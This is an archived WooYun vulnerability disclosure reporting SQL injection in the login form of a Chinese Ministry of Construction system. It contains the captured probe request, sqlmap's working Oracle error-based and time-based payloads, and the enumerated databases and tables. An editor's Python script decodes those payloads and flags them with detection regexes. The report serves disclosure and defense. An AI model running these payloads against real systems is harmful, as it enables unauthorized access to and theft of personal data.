WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online archive --------http://drop.zone.ci/
2015-08-27: Details sent to the vendor, awaiting vendor response
2015-08-30: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting body
2015-09-09: Details disclosed to core white hats and relevant domain experts
2015-09-19: Details disclosed to regular white hats
2015-09-29: Details disclosed to intern white hats
2015-10-14: Details disclosed to the public
SQL injection in a system of China's Ministry of Construction (20 databases / possible leak of nationwide supervisory staff information / status of each prefecture)
http://**.**.**.**/oa/login.jsp has a POST injection. Captured request:
POST /oa/login.jsp?action=chklogin HTTP/1.1
Host: **.**.**.**
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/oa/login.jsp?action=chklogin
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=014315ABBE9655F4CE7250B2098941A5

username=aaaa%27&password=aaa
The Oracle database is large. It leaks the accounts of supervisory personnel nationwide, and the scenic-area construction status of every region can be read from it.
Database: CSMP
[131 tables]
+---------------------------+
| BLOBTEST                  |
| CLOBTEST                  |
| COUNTVISITS               |
| GH_AREADECLARE            |
| GH_AREAPLANNING           |
| GH_BASISCOMPILATION       |
| GH_DECLARE                |
| GH_DICT                   |
| GH_FACILITIES             |
| GH_FACILITIESLEVEL        |
| GH_OTHERINFO              |
| GH_PLANNINGCHILD          |
| JC_AREAOFOWNERSHIP        |
| JC_BALANCEPAYMENTS        |
| JC_SCENIC                 |
| JC_SMINFO                 |
| JC_STAFF                  |
| JC_SUPINFO                |
| JC_TOURIST                |
| JC_VILLAGE                |
| JG_LOCATION               |
| JG_POLYGONS               |
| JG_REPORTED               |
| JG_REVIEW                 |
| JG_SUBLOCATION            |
| JG_TRIAL                  |
| JG_TUBAN                  |
| JIVEFORUM                 |
| JIVEFORUMPROP             |
| JIVEGROUP                 |
| JIVEGROUPPERM             |
| JIVEGROUPPROP             |
| JIVEGROUPUSER             |
| JIVEID                    |
| JIVEMESSAGE               |
| JIVEMESSAGEPROP           |
| JIVEMODERATION            |
| JIVEREWARD                |
| JIVETHREAD                |
| JIVETHREADPROP            |
| JIVEUSER                  |
| JIVEUSERPERM              |
| JIVEUSERPROP              |
| JIVEWATCH                 |
| KBNB_HOLIDAYSMONTHSREPORT |
| KBNB_PROJECTSTATISTICS    |
| KBNB_YEARSREPORT          |
| PLAN_TABLE                |
| TBBCCOLUMN                |
| TBBCCOLUMNBAK             |
| TBBCCONFIG                |
| TBBCFRIEND                |
| TBBCOPERATION             |
| TBBCPOWER                 |
| TBBCSCOLUMN               |
| TBBCSMPERSON              |
| TBBCSMUNIT                |
| TBBCSMUNIT2011            |
| TBBCSMUNIT_INTERFACE      |
| TBBCSMUNIT_SCZSI_ORI      |
| TBBCSMUNIT_TOURISTSVOLUME |
| TBBCSUSERCOLUMNPOWER      |
| TBBCUSER                  |
| TBBCUSERCOLUMNPOWER       |
| TBBCUSERPOWER             |
| TBBWANNUALREPORT          |
| TBBWANNUALRT              |
| TBBWAROFCONSTRUCT         |
| TBBWAROFDEAL              |
| TBBWAROFMANAGE            |
| TBBWAROFUNIT              |
| TBBWATTACHMENT            |
| TBBWDIFFPLOTRECORDS       |
| TBBWDISCUSS               |
| TBBWFASTREPORT            |
| TBBWFILEEXCHANGE          |
| TBBWGOLDENFASTREPORT      |
| TBBWIMPEACH               |
| TBBWIMPEACHFEEDBACK       |
| TBBWMATDOWNLOAD           |
| TBBWNEWS                  |
| TBBWSNEWS                 |
| TBDWAPPLYTYPE             |
| TBDWARSTATUS              |
| TBDWARTYPE                |
| TBDWATTACHMENTTYPE        |
| TBDWBUSSINESSTYPE         |
| TBDWEXCHANGETYPE          |
| TBDWFRSTATUS              |
| TBDWFRTYPE                |
| TBDWGFRSTATUS             |
| TBDWGFRTYPE               |
| TBDWIMPEACHTYPE           |
| TBDWNEWSSTATUS            |
| TBDWOPERATOR              |
| TBDWPLOTPROP              |
| TBDWPRJTYPE               |
| TBDWPROVINCE              |
| TBDWSCTYPE                |
| TBDWSMOBJTYPE             |
| TBDWSMRESULTTYPE          |
| TBDWSMTREATTYPE           |
| TBDWSMTYPE                |
| TBDWSMUNITTYPE            |
| TBDWSOPERATOR             |
| TBDWSTATUS                |
| TBDWUSERTYPE              |
| XMJS_EXPERTSOPINION       |
| XMJS_PROJECTBASEINFO      |
| XMJS_PROJECTBUILD         |
| XMJS_PROVINCEREPORTED     |
| XT_RESC                   |
| XT_USERRESC               |
| XT_USERRESC666            |
| YC_HERITAGE               |
| YC_HERITAGEAPPLAY         |
| YC_HERITAGECHILD          |
| YC_HERITAGECHILDDOC       |
| YC_HERITAGECHILDTYPE      |
| YC_HERITAGEHOLIDAYS       |
| YC_HERITAGEHOLIDAYSDETAIL |
| YC_HERITAGELOCATION       |
| YC_HERITAGEREADY          |
| YC_HERITAGETOSCENIC       |
| YC_HERITAGEUPLOAD         |
| ZW_DECLARE                |
| ZYHZ_INFO                 |
| ZYHZ_MSGM_INFO            |
| ZYHZ_RWZY_GRADE           |
| ZYHZ_ZRZY_GRADE           |
| ZYHZ_ZRZY_TYPE            |
+---------------------------+

[11:50:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 134 times
[11:50:46] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'

[*] shutting down at 11:50:46
Tables of the current database (CSMP)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: username=aaaa' AND 8819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8819=8819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- aHGR&password=aaa

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: username=aaaa' OR 1967=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(122)||CHR(102)||CHR(116),5)-- DkDJ&password=aaa
---
[11:52:11] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[11:52:11] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[11:52:11] [INFO] fetching database (schema) names
[11:52:11] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CSMP
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

[11:52:11] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[11:52:11] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\**.**.**.**'

[*] shutting down at 11:52:11
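The two sqlmap payloads above show what the login form actually handed to Oracle: the error-based one wraps a CHR()-encoded marker string and a CASE subquery in XMLType() so that the XML parser fails and echoes the result back inside the error text (the 134 HTTP 500 responses logged during the table dump are the server-side footprint of exactly this), and the time-based one blocks for 5 seconds on DBMS_PIPE.RECEIVE_MESSAGE when the injected condition holds. The script below is an added example by the editor, not part of the original report or of the affected system. It decodes the CHR() chains to expose sqlmap's marker strings and the text the XML parser receives, and it runs a small set of Oracle-injection indicators over form bodies. The signature names, the benign login and the j.smith account are this example's own constructions; the signatures are a log-triage aid, and the application-side fix remains binding username and password as query parameters instead of concatenating them into the SQL.

```python
import re
from urllib.parse import unquote_plus

# Constructed inputs: the two sqlmap payloads quoted in the report, the
# hand-made probe from the captured request, and one benign login (made up).
# Spaces are kept literal here; a real capture would carry '+' or '%20',
# which unquote_plus() handles.
ERROR_BASED = (
    "username=aaaa' AND 8819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)"
    "||CHR(112)||CHR(107)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8819=8819) "
    "THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(120)"
    "||CHR(113)||CHR(62))) FROM DUAL)-- aHGR&password=aaa"
)
TIME_BASED = (
    "username=aaaa' OR 1967=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(122)"
    "||CHR(102)||CHR(116),5)-- DkDJ&password=aaa"
)
PROBE = "username=aaaa%27&password=aaa"
BENIGN = "username=j.smith&password=Winter2015"   # constructed, not from the report

# Two or more CHR(n) joined with ||, the way sqlmap hides its marker strings.
CHR_CHAIN = re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*)+CHR\(\d+\)", re.I)

# Indicators of Oracle-flavoured injection; the names are this example's own.
SIGNATURES = {
    "oracle_time_delay": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP", re.I),
    "oracle_error_based": re.compile(r"\bXMLType\s*\(|UTL_INADDR\.|CTXSYS\.DRITHSX", re.I),
    "chr_concat_chain": CHR_CHAIN,
    "from_dual": re.compile(r"\bFROM\s+DUAL\b", re.I),
    "comment_terminator": re.compile(r"--\s|/\*"),
}


def decode_chr_chains(sql: str) -> str:
    """Replace every CHR(a)||CHR(b)||... run with the quoted string it builds."""
    def expand(match):
        codes = re.findall(r"CHR\((\d+)\)", match.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(expand, sql)


def error_based_marker_text(decoded: str, case_result: int) -> str:
    """Text Oracle's XML parser receives once the inner CASE yields case_result.

    For the report's payload this is '<:qpkjq' + result + 'qzvxq>'. That is not
    well-formed XML, so XMLType() raises a parse error that quotes the offending
    text, and sqlmap reads the result back from between the two markers.
    """
    m = re.search(r"XMLType\('([^']*)'\|\|\(SELECT .*?FROM DUAL\)\|\|'([^']*)'\)", decoded)
    return m.group(1) + str(case_result) + m.group(2) if m else ""


def score_form_body(body: str) -> dict:
    """Map each suspicious form field to the list of indicators it triggered."""
    findings = {}
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if value.count("'") % 2 == 1:          # a lone quote: the classic first probe
            hits.append("unbalanced_quote")
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for label, body in (("probe", PROBE), ("error-based", ERROR_BASED),
                        ("time-based", TIME_BASED), ("benign", BENIGN)):
        print(f"{label:12s} {score_form_body(body)}")
    print(decode_chr_chains(TIME_BASED))
    print(error_based_marker_text(decode_chr_chains(ERROR_BASED), 1))
```

Run against access logs or a WAF's request bodies, the single most reliable signal from this report is not any one regex but the combination: an unbalanced quote in a login field from one JSESSIONID, followed by a burst of HTTP 500s on the same path. The time-based payload never produces an error, which is why the second sqlmap run above logged only 2 of them; for that variant the per-request latency on login.jsp is the thing to watch.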
I did not go further into all the databases; locating the account table and dumping it is enough.
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-08-30 07:14
CNVD confirmed and reproduced the described issue; it has been forwarded by CNCERT to the national higher-level information security coordination body, which will coordinate remediation with the site's administering unit.
None yet